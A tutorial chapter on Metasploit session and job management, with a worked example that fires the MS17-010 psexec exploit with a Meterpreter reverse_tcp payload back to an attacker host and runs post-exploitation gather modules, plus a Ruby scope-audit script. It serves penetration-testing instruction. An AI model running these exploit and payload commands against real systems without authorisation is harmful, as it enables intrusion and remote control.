Sessions and Jobs

Overview

Sessions and jobs in Metasploit enable penetration testers to manage multiple ongoing tasks, maintain access to exploited systems, and organize their workflows. This chapter focuses on understanding, creating, and managing sessions and jobs effectively.

Sessions in Metasploit

A session is an active connection between the attacker and the target system, established after a successful exploit. Sessions allow interaction with compromised systems through Meterpreter shells, command-line interfaces, or other payload connections.

Working with Sessions

  1. List Active Sessions:

    • View all open sessions:

      sessions
  2. Interact with a Session:

    • Switch to a specific session:

      sessions -i <session_id>
  3. Background a Session:

    • Send an active session to the background:

      background
    • Alternatively, use Ctrl+Z to background a session.

  4. Terminate a Session:

    • End a specific session:

      sessions -k <session_id>
    • Kill all active sessions:

      sessions -K
  5. View Session Information:

    • Display details about a specific session:

      sessions -i <session_id>
      info

Jobs in Metasploit

A job is a background task running in Metasploit. Jobs are often used for long-running tasks, such as exploit handlers or auxiliary modules like scanners.

Working with Jobs

  1. List Active Jobs:

    • Display all running jobs:

      jobs
  2. Stop a Job:

    • Terminate a specific job:

      jobs -k <job_id>
    • Kill all active jobs:

      jobs -K
  3. Run a Module as a Job:

    • Execute an exploit or auxiliary module in the background:

      exploit -j
  4. View Job Information:

    • Display detailed information about a job:

      jobs -v

Using Sessions and Jobs Together

  1. Exploit and Maintain Access:

    • Run an exploit in the background while monitoring active sessions:

      exploit -j
      sessions
  2. Link Modules to a Session:

    • Use post-exploitation modules on an existing session:

      use post/windows/gather/enum_logged_on_users
      set SESSION <session_id>
      run
  3. Switch Between Sessions:

    • Interact with multiple compromised systems by switching between sessions:

      sessions -i <session_id>
  4. Convert a Session to a Job:

    • Background a session to free up the console for other tasks:

      background

Practical Example: Meterpreter Session

  1. Create a Session:

    • Use an exploit to gain access:

      use exploit/windows/smb/ms17_010_psexec
      set payload windows/meterpreter/reverse_tcp
      set RHOSTS <target_ip>
      set LHOST <attacker_ip>
      exploit
  2. Interact with the Session:

    • Check active sessions:

      sessions
    • Interact with the session:

      sessions -i 1
  3. Background the Session:

    • Send the session to the background:

      background
  4. Run a Post-Exploitation Module:

    • Gather system information from the target:

      use post/windows/gather/system_info
      set SESSION 1
      run

Best Practices

  1. Organize Sessions and Jobs:

    • Regularly list and terminate unused sessions and jobs to avoid conflicts.

  2. Track Active Sessions:

    • Use meaningful notes or labels to identify each session (e.g., IP or hostname).

  3. Monitor Resource Usage:

    • Avoid running too many concurrent jobs or sessions to prevent performance issues.

  4. Background Long-Running Tasks:

    • Always background tasks like handlers or scanners to free up the console.
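
The first two practices above can be checked against the console's own session listing. The following Ruby example is added here and is not part of the original chapter or of Metasploit: it parses a constructed sample of the table that sessions prints and reports sessions that carry no label and sessions whose peer is not on an in-scope host list. The sample text, the column layout it assumes, and the names parse_sessions, audit_sessions and scope are assumptions made for illustration.

```ruby
# Constructed sample modelled on the table `sessions` prints (assumed layout);
# addresses are documentation ranges, not output from a real engagement.
SAMPLE = <<~'TXT'
  Active sessions
  ===============

    Id  Name  Type                     Information                 Connection
    --  ----  ----                     -----------                 ----------
    1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WS01  192.0.2.10:4444 -> 192.0.2.21:49158 (192.0.2.21)
    2   web   shell cmd/unix                                       192.0.2.10:4444 -> 198.51.100.7:51000 (198.51.100.7)
TXT

# Slice one table line into cells using the column start offsets.
def cells(line, starts)
  starts.each_with_index.map do |s, i|
    stop = starts[i + 1] || [line.length, s].max
    line[s, stop - s].to_s.strip
  end
end

# Columns are located from the dashed underline rather than by splitting on
# whitespace, because Name and Information are often empty.
def parse_sessions(text)
  lines = text.lines.map(&:chomp)
  rule = lines.index { |l| l.match?(/\A\s*-+(\s+-+)+\s*\z/) }
  return [] if rule.nil? || rule.zero?
  starts = []
  lines[rule].scan(/-+/) { starts << Regexp.last_match.begin(0) }
  keys = cells(lines[rule - 1], starts).map { |h| h.downcase.to_sym }
  lines[(rule + 1)..].reject { |l| l.strip.empty? }.map do |l|
    row = keys.zip(cells(l, starts)).to_h
    # The peer address is the value in parentheses that ends Connection.
    row.merge(id: row[:id].to_i, target: row[:connection][/\(([^)]+)\)\s*\z/, 1])
  end
end

# scope: hosts authorised by the rules of engagement (hypothetical input).
def audit_sessions(sessions, scope)
  {
    out_of_scope: sessions.reject { |s| scope.include?(s[:target]) }.map { |s| s[:id] },
    unlabeled: sessions.select { |s| s[:name].empty? }.map { |s| s[:id] }
  }
end

p audit_sessions(parse_sessions(SAMPLE), %w[192.0.2.21]) if __FILE__ == $PROGRAM_NAME
```

Session ids reported under out_of_scope or unlabeled are the ones to review before the engagement continues.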


Command Cheatsheet

  Command            Description
  -----------------  -----------------------------------
  sessions           List all active sessions.
  sessions -i <id>   Interact with a specific session.
  sessions -k <id>   Terminate a specific session.
  sessions -K        Kill all active sessions.
  jobs               List all running jobs.
  jobs -k <id>       Terminate a specific job.
  jobs -K            Kill all active jobs.
  exploit -j         Run an exploit as a background job.
  background         Background the current session.